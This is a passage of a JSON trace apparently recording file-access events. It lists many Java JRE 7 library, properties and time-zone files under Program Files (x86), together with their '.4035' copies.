[], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\currency.data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\flavormap.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\flavormap.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.bfc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.bfc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.properties.src.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.properties.src", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\javafx.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\javafx.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\javaws.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\javaws.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jce.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jce.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfr.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfr.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfxrt.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfxrt.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jsse.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jsse.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\logging.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\logging.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\meta-index.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\meta-index", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\net.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\net.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\psfont.properties.ja.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\psfont.properties.ja", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\psfontj2d.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\psfontj2d.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\sound.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\sound.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\tzmappings.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\tzmappings", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cet.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cet", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cst6cdt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cst6cdt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\eet.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\eet", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est5edt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est5edt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\gmt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\gmt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\hst.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\hst", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\met.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\met", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst7mdt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst7mdt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pst8pdt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pst8pdt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\wet.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\wet", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\zoneinfomappings.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\zoneinfomappings", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4adt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4adt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6cdt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6cdt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5edt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5edt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\hst10.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\hst10", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7mdt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7mdt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8pdt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8pdt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9ydt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9ydt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\apia.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\apia", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\auckland.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\auckland", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chatham.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chatham", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chuuk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chuuk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\easter.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\easter", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\efate.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\efate", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\enderbury.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\enderbury", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fakaofo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fakaofo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fiji.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fiji", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\funafuti.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Funafuti", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\funafuti", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\galapagos.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\galapagos", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\gambier.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files 